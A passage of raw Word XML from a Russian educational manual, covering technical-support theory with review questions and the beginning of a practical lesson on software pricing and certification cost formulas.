        <w:t>Задача №4</w:t>
      </w:r>
      <w:r w:rsidR="00DB6A4A" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>При установке программы у меня не хватает прав.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA4CC7" w:rsidRPr="00617AC0" w:rsidRDefault="00AA4CC7" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00431529" w:rsidRPr="00617AC0" w:rsidRDefault="00AA4CC7" w:rsidP="00431529">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Задание</w:t>
      </w:r>
      <w:r w:rsidR="00431529" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00431529" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Выполнить описание предоставляемых услуг технической поддержки ПО</w:t>
      </w:r>
      <w:r w:rsidR="00431529" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA4CC7" w:rsidRPr="00617AC0" w:rsidRDefault="00AA4CC7" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AA4CC7" w:rsidRPr="00617AC0" w:rsidRDefault="00F40D1D" w:rsidP="00AA4CC7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Основные теоретические сведения</w:t>
      </w:r>
      <w:r w:rsidR="00AA4CC7" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA4CC7" w:rsidRPr="00617AC0" w:rsidRDefault="00AA4CC7" w:rsidP="00AA4CC7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Техническая поддержка или техподдержка - собирательное понятие, обобщающее собой и охватывающее множество услуг, посредством которых предприятия и организации обеспечивают помощь пользователям технологичных продуктов и услуг, например таких, как мобильные и стационарные телефоны, телевизоры, компьютеры, программное обеспечение, а также других электронных и механических товаров и услуг.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA4CC7" w:rsidRPr="00617AC0" w:rsidRDefault="00AA4CC7" w:rsidP="00AA4CC7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>В целом, техническая поддержка служит попыткам помочь конкретным пользователям решать возникающие конкретные проблемы с продуктом и его использованием, нежели задачи, связанные с обучением, индивидуальной настройкой или другими услугами поддержки.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA4CC7" w:rsidRPr="00617AC0" w:rsidRDefault="00AA4CC7" w:rsidP="00AA4CC7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Большинство компаний предлагают техническую поддержку к продуктам, которые они предоставляют и продают, и делают это либо бесплатно, либо за дополнительную плату. Техническая поддержка предоставляется, как правило, по телефону, через интернет, по электронной почте, через онлайн-сервисы поддержки на веб-сайте или через инструменты, посредством которых пользователи могут зарегистрировать заявку или создать инцидент и затем проследить их судьбу - историю состояний/этапов ее или его решения. Большие организации часто имеют собственную, внутреннюю службу технической поддержки, </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>которая помогает персоналу решать возникающие проблемы, носящие технический характер. Также, хорошим источником бесплатной технической поддержки явлется интернет, где опытные пользователи на различных форумах и сайтах могут что-нибудь посоветовать или помочь в решении или поделиться своим опытом решения таких же или похожих проблем. Также, некоторые компании, предоставляют премиальную техническую поддержку за дополнительную плату.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA4CC7" w:rsidRPr="00617AC0" w:rsidRDefault="00AA4CC7" w:rsidP="00AA4CC7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Говоря о технической поддержке могут иметь в виду и т.н. helpdesk - досл. с англ. </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>стол помощи</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, и service desk - досл. с англ. </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>стол услуги</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> и поддержку продукта или услуги, и поддержку клиента, и систему работы с инцидентами, заявками и проблемами.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB6A4A" w:rsidRPr="00617AC0" w:rsidRDefault="00DB6A4A" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Перечень контрольных вопросов:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB6A4A" w:rsidRPr="00617AC0" w:rsidRDefault="00DB6A4A" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1. Какова цель консультирования пользователей?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB6A4A" w:rsidRPr="00617AC0" w:rsidRDefault="00DB6A4A" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2. Какие риски несет обновление программного обеспечения?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA4CC7" w:rsidRPr="00617AC0" w:rsidRDefault="00DB6A4A" w:rsidP="00AA4CC7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3. Какие риски несет отказ от обновления программного обеспечения?</w:t>
      </w:r>
      <w:r w:rsidR="00AA4CC7" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA4CC7" w:rsidRPr="00617AC0" w:rsidRDefault="00AA4CC7" w:rsidP="00AA4CC7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4. Что такое техподдержка?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA4CC7" w:rsidRPr="00617AC0" w:rsidRDefault="00AA4CC7" w:rsidP="00AA4CC7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5. Какие функции выполняет техподдержка?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA4CC7" w:rsidRPr="00617AC0" w:rsidRDefault="00AA4CC7" w:rsidP="00AA4CC7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>6. Какие услуги должна оказывать техподдержка?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB6A4A" w:rsidRPr="00617AC0" w:rsidRDefault="00DB6A4A" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00DB3FFC" w:rsidRPr="00617AC0" w:rsidRDefault="00DB3FFC" w:rsidP="007755F7">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="200" w:name="_Toc507788265"/>
      <w:bookmarkStart w:id="201" w:name="_Toc507788540"/>
      <w:bookmarkStart w:id="202" w:name="_Toc26278746"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Практическое занятие № </w:t>
      </w:r>
      <w:r w:rsidR="00990861" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>27</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Анализ ценообразования программного обеспечения отраслевой направленности</w:t>
      </w:r>
      <w:bookmarkEnd w:id="200"/>
      <w:bookmarkEnd w:id="201"/>
      <w:bookmarkEnd w:id="202"/>
    </w:p>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Цель</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: формирование навыков определения цены программного продукта.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Оборудование</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: персональный компьютер.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="00F40D1D" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Основные теоретические сведения</w:t>
      </w:r>
      <w:r w:rsidR="006C1EEC" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Полная себестоимость продукта или услуги складывается из трех компонент: себестоимости сертификации работ/услуг (С</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t>с</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>); себестоимости разработки проекта (С</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t>П</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>), и себестоимости коммерческой эксплуатации проекта (С</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t>КЭ</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>), которая входит в полную себестоимость как постоянная величина по всем годам коммерческой эксплуатации.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1206748" cy="223200"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="60" name="Рисунок 26" descr="http://ok-t.ru/studopedia/baza14/71156389034.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ok-t.ru/studopedia/baza14/71156389034.files/image001.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId447" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1202577" cy="222429"/>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В общем случае суммарные затраты заявителя на сертификацию продукции (услуги) определяются по следующей формуле:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2472549" cy="295200"/>
            <wp:effectExtent l="19050" t="0" r="3951" b="0"/>
            <wp:docPr id="59" name="Рисунок 27" descr="http://ok-t.ru/studopedia/baza14/71156389034.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ok-t.ru/studopedia/baza14/71156389034.files/image002.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId448" cstate="print"/>
                    <a:srcRect r="11768" b="12153"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2476766" cy="295704"/>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где:</w:t>
      </w:r>
      <w:r w:rsidR="007F3F21" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>С</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t>о.с.</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>- стоимость услуг органа по сертификации;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>С</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t>об.</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>- стоимость образцов, взятых у изготовителя для испытаний;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>С</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t>и.п</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>- стоимость испытаний продукции в аккредитованной лаборатории;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>С</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t>с.к</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>- стоимость сертификации систем качества;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>С</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t>и.к</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>- стоимость инспекционного контроля;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>С</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t>иск.j</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>- стоимость одной проверки в рамках инспекционного контроля;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>m - число проверок;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Т</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t>р</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>- расходы по отбору, упаковке и транспортировке образцов к месту испытаний.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Для расчета стоимости работ по сертификации в приведенную формулу включаются только те компоненты, которые соответствуют составу фактически проводимых работ. Достаточно часто суммарные затраты на сертификацию определяются тремя членами:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>С = С</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t>о.с</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> +С</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t xml:space="preserve">и.п. </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>+С</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t>и.к.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Стоимость услуг органа по сертификации вычисляется по выражению:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>С</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t>о.с</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> =t</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t>o.с.i</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Т[1+(К</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t>н.з.</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> +К</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t>н.р.</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)/100](1+Р/100),</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>где:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
